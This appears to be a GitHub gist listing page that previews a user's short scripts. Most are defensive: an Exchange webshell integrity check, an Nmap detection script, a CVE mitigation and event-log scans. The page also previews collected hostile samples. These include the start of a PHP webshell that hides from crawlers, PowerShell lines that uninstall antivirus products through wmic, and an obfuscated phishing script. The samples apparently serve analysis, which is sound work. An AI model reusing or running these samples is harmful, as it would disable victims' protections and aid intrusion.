View ExchangeIntegrity.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Exchange IIS Server Integrity Check | |
Identify common webshells and backdoors associated with compromises | |
Usage: | |
Prepare a hash list. Note this may need to be updated after Microsoft Exchange updates | |
Write-IntegrityFile [ -hashfile "filename.json" ] |
View hacked.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}} | |
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']'); | |
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']'); | |
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']'); |
View Exchange Version.nse
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local http = require "http" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local table = require "table" | |
local string = require "string" | |
author = {"technion@lolware.net"} | |
license = "Same as Nmap--See https://nmap.org/book/man-legal.html" | |
categories = {"discovery", "safe"} | |
-- Detection rule based on: https://twitter.com/GossiTheDog/status/1424673929382268932 |
View CVE-2021-40444Mit.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-Strictmode -Version 2 | |
# Applies reg keys from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 | |
# Although the above document is still "Revision 1.0", Microsoft has removed the WOW6432 section | |
for($i = 0; $i -le 3; $i++) { | |
$RegPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$i" | |
if (-not (Test-Path $RegPath)) { | |
New-Item $RegPath -Force | |
} |
View AutorunsVT.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$autorunsCsv = "\AutorunsOutput.csv" | |
$autorunsArray = Import-Csv $autorunsCsv | |
Foreach ($item in $autorunsArray) { | |
$detection = $item.'VT detection' | |
if ($detection -eq "" -or $detection -eq 'Unknown') { | |
continue | |
} | |
Write-Output $detection |
View Malicious.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$v='ipc'; | |
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive | |
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive |
View LicenseManagement.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-StrictMode -Version 2 | |
# Connect first | |
# Connect-AzureAD | |
function Get-LicencesforUser | |
{ | |
param([object]$user) | |
# $user should be populated with | |
# $user = Get-AzureADUser -ObjectId username@domain.com |
View tank.wa
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!WA:2!1zvZUTTrq4YOwKc1IcB3a30FqbtBtacqRQLsIDQrqqfTLtuJSTcLSDcGrLwYDL42qUC7UlTLuVjKd5SEe0HCOON0JGFcim6tGrFc8lq7SKuYQUUxKwoC2DN5B(MVHgBTuWs4LWVX3jsseT6Bmjiet8Rk3JrvELqCQNO3UD6ijkJjyQK7J63K0tDnr)PwrmxVqr9qkt5SrLDAwXEItOateBe6hk(PC5Yvp3kfEWejkGO3AKG0UuKW)AN7GCFvxryedN6AIFx6NZFfHWll5exLnsrd9gNeGT4iLh)wGDFF53JeUigHhEmKcsfsrA56rKQcbLSWePl)PLzm4ACjsZgEiC4XorcMPGiPsL0KYmD9qktCKGY6AQ8iMnpgmwjGteHcPjH5c7wrefgkcv6OGzy1jKP4lSLGoW85riSaPqMnB64kc5T6x)DxPW9lEUknDpqG4BdrT9g1kVD9HsYVgbhjjhFXoHcskcKHm8vRQVOoixYHLX4qM8WdiOxvosGKhwxNGjl3MGPOdtTQ)9ENktYRxKwuYXxakNLX)sKurWe82uM3y4MGaVzFoXI6gYsl0aC1ks(8rAlvz66j)gUHH(WzX0H0MujYXNG9gj9rmLolCQUtJQBwzmSdmvJfY8ISen(ZMekOewkgnC)k2nRUr5ANKYhsJTpWcfPGYOk09iIqc(9(F7DNsTQch6nV2h)3wdcddmUief9(RfkfrXtw5(LTxBn7JSDWdDdd4qnu6LX3sI)pX(ykw5vK)5ZXwBb4Cas1INTWwrdiqjZnj8x1g4mc1(Ia4WqDj87E7Ifsyw7auwZh)y7eIcb)Ohz(DMLFYtS31SAdZgpTAtUz2EMEdflaeoLEFzwSyHmYjt9sbOFPgLFj)w)N9n7cZmfV(yCyRm3ABrH(X8oDG)KE5h3H2JGpqNOV(dVaLudm4lCrtvkE)EWALpLb4)EnRvDNk8BaHickxqFI1mN9olfe1wWahMVGLpDWaKaB2e4dkkFKK43jTn3A3Mn3DBB3Pn4gos |
View Scan-Netlogon-Secure.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# More information: https://support.microsoft.com/en-au/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc | |
Set-StrictMode -Version 2 | |
# Fetch all Domain Controllers. Use this pattern to fetch from all sites. | |
$addomain = Get-ADDomain | |
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)" | |
foreach ($dc in $controllers) { | |
# Errors are ignored so as not to throw an exception if there are no such logs found | |
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore |
View phishing.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict'; | |
/** @type {!Array} */ | |
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string", | |
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write" |
NewerOlder